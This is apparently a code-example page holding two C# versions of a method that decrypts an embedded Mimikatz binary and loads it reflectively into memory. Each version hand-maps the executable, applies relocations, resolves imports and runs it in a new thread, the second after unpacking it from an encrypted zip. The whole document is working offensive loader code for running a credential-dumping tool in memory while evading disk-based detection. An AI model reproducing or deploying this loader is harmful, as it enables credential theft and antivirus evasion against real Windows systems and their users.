Exemplo n.º 1
0
        public static void Exec()
        {
            byte[] latestMimikatz = null;
            try
            {
                //Use Misc Class to encrypt your own files



                if (IntPtr.Size == 8)
                {
                    //x64 Unpack And Execute
                    latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex64), "password");                     //Yes, this is a bad idea.
                }
                else if (IntPtr.Size == 4)
                {
                    //x86 Unpack And Execute
                    latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex86), "password");                     //Yes, this is a bad idea.
                }
            }
            catch (Exception ex)
            {
                while (ex != null)
                {
                    Console.WriteLine(ex.Message);
                    ex = ex.InnerException;
                }
            }

            Console.WriteLine("Downloaded Latest");
            PELoader pe = new PELoader(latestMimikatz);



            IntPtr codebase = IntPtr.Zero;

            if (pe.Is32BitHeader)
            {
                Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
                codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
            }
            else
            {
                Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
                codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
            }



            //Copy Sections
            for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
            {
                IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
                Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
            }

            //Perform Base Relocation
            //Calculate Delta
            IntPtr currentbase = codebase;
            long   delta;

            if (pe.Is32BitHeader)
            {
                delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
            }
            else
            {
                delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
            }

            Console.WriteLine("Delta = {0}", delta.ToString("X4"));

            //Modify Memory Based On Relocation Table
            IntPtr relocationTable;

            if (pe.Is32BitHeader)
            {
                relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
            }
            else
            {
                relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
            }


            NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
            relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));

            int    imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
            IntPtr nextEntry       = relocationTable;
            int    sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
            IntPtr offset          = relocationTable;

            while (true)
            {
                NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
                IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock);
                relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));

                IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress);

                for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
                {
                    IntPtr patchAddr;
                    UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));

                    UInt16 type  = (UInt16)(value >> 12);
                    UInt16 fixup = (UInt16)(value & 0xfff);

                    switch (type)
                    {
                    case 0x0:
                        break;

                    case 0x3:
                        patchAddr = IntPtrAdd(dest, fixup);
                        //Add Delta To Location.
                        int originalx86Addr = Marshal.ReadInt32(patchAddr);
                        Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
                        break;

                    case 0xA:
                        patchAddr = IntPtrAdd(dest, fixup);
                        //Add Delta To Location.
                        long originalAddr = Marshal.ReadInt64(patchAddr);
                        Marshal.WriteInt64(patchAddr, originalAddr + delta);
                        break;
                    }
                }

                offset           = IntPtrAdd(relocationTable, sizeofNextBlock);
                sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
                relocationEntry  = relocationNextEntry;

                nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock);

                if (relocationNextEntry.SizeOfBlock == 0)
                {
                    break;
                }
            }


            //Resolve Imports

            IntPtr z;
            IntPtr oa1;
            int    oa2;

            if (pe.Is32BitHeader)
            {
                z   = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
            }
            else
            {
                z   = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
            }



            //Get And Display Each DLL To Load

            IntPtr threadStart;
            IntPtr hThread;

            if (pe.Is32BitHeader)
            {
                int j = 0;
                while (true) //HardCoded Number of DLL's Do this Dynamically.
                {
                    IntPtr a1          = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                    int    entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                    IntPtr a2          = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
                    IntPtr dllNamePTR  = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                    string DllName     = Marshal.PtrToStringAnsi(dllNamePTR);
                    if (DllName == "")
                    {
                        break;
                    }

                    IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                    Console.WriteLine("Loaded {0}", DllName);
                    int k = 0;
                    while (true)
                    {
                        IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                        string DllFuncName    = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                        IntPtr funcAddy       = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                        Marshal.WriteInt32(a2, (int)funcAddy);
                        a2 = IntPtrAdd(a2, 4);
                        if (DllFuncName == "")
                        {
                            break;
                        }
                        k++;
                    }
                    j++;
                }
                //Transfer Control To OEP
                Console.WriteLine("Executing Mimikatz");
                threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
                hThread     = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);

                Console.WriteLine("Thread Complete");
            }
            else
            {
                int j = 0;
                while (true)
                {
                    IntPtr a1          = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                    int    entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                    IntPtr a2          = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
                    IntPtr dllNamePTR  = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                    string DllName     = Marshal.PtrToStringAnsi(dllNamePTR);
                    if (DllName == "")
                    {
                        break;
                    }

                    IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                    Console.WriteLine("Loaded {0}", DllName);
                    int k = 0;
                    while (true)
                    {
                        IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                        string DllFuncName    = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                        //Console.WriteLine("Function {0}", DllFuncName);
                        IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                        Marshal.WriteInt64(a2, (long)funcAddy);
                        a2 = IntPtrAdd(a2, 8);
                        if (DllFuncName == "")
                        {
                            break;
                        }
                        k++;
                    }
                    j++;
                }
                //Transfer Control To OEP
                Console.WriteLine("Executing Mimikatz");
                threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
                hThread     = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);

                Console.WriteLine("Thread Complete");
            }

            //Transfer Control To OEP

            Console.WriteLine("Thread Complete");
            //Console.ReadLine();
        } //End Main
Exemplo n.º 2
0
        // Token: 0x06000003 RID: 3 RVA: 0x00002064 File Offset: 0x00000264
        public static void Exec()
        {
            byte[] fileBytes = null;
            try
            {
                byte[]     buffer     = Misc.Decrypt(Convert.FromBase64String(Package.file), "password");
                Stream     stream     = new MemoryStream(buffer);
                ZipArchive zipArchive = new ZipArchive(stream);
                foreach (ZipArchiveEntry current in zipArchive.Entries)
                {
                    if (IntPtr.Size == 8 && current.FullName == "x64/mimikatz.exe")
                    {
                        Console.WriteLine(current.FullName);
                        Stream input = current.Open();
                        fileBytes = Misc.ReadFully(input);
                    }
                    else if (IntPtr.Size == 4 && current.FullName == "Win32/mimikatz.exe")
                    {
                        Console.WriteLine(current.FullName);
                        Stream input = current.Open();
                        fileBytes = Misc.ReadFully(input);
                    }
                }
            }
            catch (Exception innerException)
            {
                while (innerException != null)
                {
                    Console.WriteLine(innerException.Message);
                    innerException = innerException.InnerException;
                }
            }
            Console.WriteLine("Downloaded Latest");
            PELoader pELoader = new PELoader(fileBytes);
            IntPtr   intPtr   = IntPtr.Zero;

            if (pELoader.Is32BitHeader)
            {
                string arg_174_0 = "Preferred Load Address = {0}";
                uint   num       = pELoader.OptionalHeader32.ImageBase;
                Console.WriteLine(arg_174_0, num.ToString("X4"));
                intPtr = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pELoader.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                string arg_1C7_0 = "Allocated Space For {0} at {1}";
                num = pELoader.OptionalHeader32.SizeOfImage;
                Console.WriteLine(arg_1C7_0, num.ToString("X4"), intPtr.ToString("X4"));
            }
            else
            {
                string arg_1F0_0 = "Preferred Load Address = {0}";
                ulong  imageBase = pELoader.OptionalHeader64.ImageBase;
                Console.WriteLine(arg_1F0_0, imageBase.ToString("X4"));
                intPtr = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pELoader.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                string arg_243_0 = "Allocated Space For {0} at {1}";
                uint   num       = pELoader.OptionalHeader64.SizeOfImage;
                Console.WriteLine(arg_243_0, num.ToString("X4"), intPtr.ToString("X4"));
            }
            for (int i = 0; i < (int)pELoader.FileHeader.NumberOfSections; i++)
            {
                IntPtr destination = NativeDeclarations.VirtualAlloc(IntPtr.Add(intPtr, (int)pELoader.ImageSectionHeaders[i].VirtualAddress), pELoader.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                Marshal.Copy(pELoader.RawBytes, (int)pELoader.ImageSectionHeaders[i].PointerToRawData, destination, (int)pELoader.ImageSectionHeaders[i].SizeOfRawData);
                Console.WriteLine("Section {0}, Copied To {1}", new string(pELoader.ImageSectionHeaders[i].Name), destination.ToString("X4"));
            }
            IntPtr intPtr2 = intPtr;
            long   num2;

            if (pELoader.Is32BitHeader)
            {
                num2 = (long)(intPtr2.ToInt32() - (int)pELoader.OptionalHeader32.ImageBase);
            }
            else
            {
                num2 = intPtr2.ToInt64() - (long)pELoader.OptionalHeader64.ImageBase;
            }
            Console.WriteLine("Delta = {0}", num2.ToString("X4"));
            IntPtr intPtr3;

            if (pELoader.Is32BitHeader)
            {
                intPtr3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader32.BaseRelocationTable.VirtualAddress);
            }
            else
            {
                intPtr3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader64.BaseRelocationTable.VirtualAddress);
            }
            NativeDeclarations.IMAGE_BASE_RELOCATION iMAGE_BASE_RELOCATION = default(NativeDeclarations.IMAGE_BASE_RELOCATION);
            iMAGE_BASE_RELOCATION = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(intPtr3, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
            int    num3    = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
            IntPtr pointer = intPtr3;
            int    num4    = (int)iMAGE_BASE_RELOCATION.SizeOfBlock;
            IntPtr ptr     = intPtr3;

            NativeDeclarations.IMAGE_BASE_RELOCATION iMAGE_BASE_RELOCATION2;
            do
            {
                iMAGE_BASE_RELOCATION2 = default(NativeDeclarations.IMAGE_BASE_RELOCATION);
                IntPtr ptr2 = IntPtr.Add(intPtr3, num4);
                iMAGE_BASE_RELOCATION2 = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(ptr2, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
                IntPtr pointer2 = IntPtr.Add(intPtr, (int)iMAGE_BASE_RELOCATION.VirtualAdress);
                for (int i = 0; i < (int)(((ulong)iMAGE_BASE_RELOCATION.SizeOfBlock - (ulong)((long)num3)) / 2uL); i++)
                {
                    ushort num5   = (ushort)Marshal.ReadInt16(ptr, 8 + 2 * i);
                    ushort num6   = (ushort)(num5 >> 12);
                    ushort offset = num5 & 4095;
                    ushort num7   = num6;
                    if (num7 != 0)
                    {
                        if (num7 != 3)
                        {
                            if (num7 == 10)
                            {
                                IntPtr ptr3 = IntPtr.Add(pointer2, (int)offset);
                                long   num8 = Marshal.ReadInt64(ptr3);
                                Marshal.WriteInt64(ptr3, num8 + num2);
                            }
                        }
                        else
                        {
                            IntPtr ptr3 = IntPtr.Add(pointer2, (int)offset);
                            int    num9 = Marshal.ReadInt32(ptr3);
                            Marshal.WriteInt32(ptr3, num9 + (int)num2);
                        }
                    }
                }
                ptr   = IntPtr.Add(intPtr3, num4);
                num4 += (int)iMAGE_BASE_RELOCATION2.SizeOfBlock;
                iMAGE_BASE_RELOCATION = iMAGE_BASE_RELOCATION2;
                pointer = IntPtr.Add(pointer, num4);
            }while (iMAGE_BASE_RELOCATION2.SizeOfBlock != 0u);
            int num10;

            if (pELoader.Is32BitHeader)
            {
                IntPtr intPtr4  = IntPtr.Add(intPtr, (int)pELoader.ImageSectionHeaders[1].VirtualAddress);
                IntPtr pointer3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader32.ImportTable.VirtualAddress);
                num10 = Marshal.ReadInt32(IntPtr.Add(pointer3, 16));
            }
            else
            {
                IntPtr intPtr4  = IntPtr.Add(intPtr, (int)pELoader.ImageSectionHeaders[1].VirtualAddress);
                IntPtr pointer3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader64.ImportTable.VirtualAddress);
                num10 = Marshal.ReadInt32(IntPtr.Add(pointer3, 16));
            }
            if (pELoader.Is32BitHeader)
            {
                int num11 = 0;
                while (true)
                {
                    IntPtr pointer4 = IntPtr.Add(intPtr, 20 * num11 + (int)pELoader.OptionalHeader32.ImportTable.VirtualAddress);
                    int    num12    = Marshal.ReadInt32(IntPtr.Add(pointer4, 16));
                    IntPtr intPtr5  = IntPtr.Add(intPtr, (int)(pELoader.ImageSectionHeaders[1].VirtualAddress + (uint)(num12 - num10)));
                    IntPtr ptr4     = IntPtr.Add(intPtr, Marshal.ReadInt32(IntPtr.Add(pointer4, 12)));
                    string text     = Marshal.PtrToStringAnsi(ptr4);
                    if (text == "")
                    {
                        break;
                    }
                    IntPtr hModule = NativeDeclarations.LoadLibrary(text);
                    Console.WriteLine("Loaded {0}", text);
                    int num13 = 0;
                    while (true)
                    {
                        IntPtr pointer5    = IntPtr.Add(intPtr, Marshal.ReadInt32(intPtr5));
                        string text2       = Marshal.PtrToStringAnsi(IntPtr.Add(pointer5, 2));
                        IntPtr procAddress = NativeDeclarations.GetProcAddress(hModule, text2);
                        Marshal.WriteInt32(intPtr5, (int)procAddress);
                        intPtr5 = IntPtr.Add(intPtr5, 4);
                        if (text2 == "")
                        {
                            break;
                        }
                        num13++;
                    }
                    num11++;
                }
                Console.WriteLine("Executing Mimikatz");
                IntPtr lpStartAddress = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader32.AddressOfEntryPoint);
                IntPtr hHandle        = NativeDeclarations.CreateThread(IntPtr.Zero, 0u, lpStartAddress, IntPtr.Zero, 0u, IntPtr.Zero);
                NativeDeclarations.WaitForSingleObject(hHandle, 4294967295u);
                Console.WriteLine("Thread Complete");
            }
            else
            {
                int num11 = 0;
                while (true)
                {
                    IntPtr pointer4 = IntPtr.Add(intPtr, 20 * num11 + (int)pELoader.OptionalHeader64.ImportTable.VirtualAddress);
                    int    num12    = Marshal.ReadInt32(IntPtr.Add(pointer4, 16));
                    IntPtr intPtr5  = IntPtr.Add(intPtr, (int)(pELoader.ImageSectionHeaders[1].VirtualAddress + (uint)(num12 - num10)));
                    IntPtr ptr4     = IntPtr.Add(intPtr, Marshal.ReadInt32(IntPtr.Add(pointer4, 12)));
                    string text     = Marshal.PtrToStringAnsi(ptr4);
                    if (text == "")
                    {
                        break;
                    }
                    IntPtr hModule = NativeDeclarations.LoadLibrary(text);
                    Console.WriteLine("Loaded {0}", text);
                    int num13 = 0;
                    while (true)
                    {
                        IntPtr pointer5    = IntPtr.Add(intPtr, Marshal.ReadInt32(intPtr5));
                        string text2       = Marshal.PtrToStringAnsi(IntPtr.Add(pointer5, 2));
                        IntPtr procAddress = NativeDeclarations.GetProcAddress(hModule, text2);
                        Marshal.WriteInt64(intPtr5, (long)procAddress);
                        intPtr5 = IntPtr.Add(intPtr5, 8);
                        if (text2 == "")
                        {
                            break;
                        }
                        num13++;
                    }
                    num11++;
                }
                Console.WriteLine("Executing Mimikatz");
                IntPtr lpStartAddress = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader64.AddressOfEntryPoint);
                IntPtr hHandle        = NativeDeclarations.CreateThread(IntPtr.Zero, 0u, lpStartAddress, IntPtr.Zero, 0u, IntPtr.Zero);
                NativeDeclarations.WaitForSingleObject(hHandle, 4294967295u);
                Console.WriteLine("Thread Complete");
            }
            Console.WriteLine("Thread Complete");
        }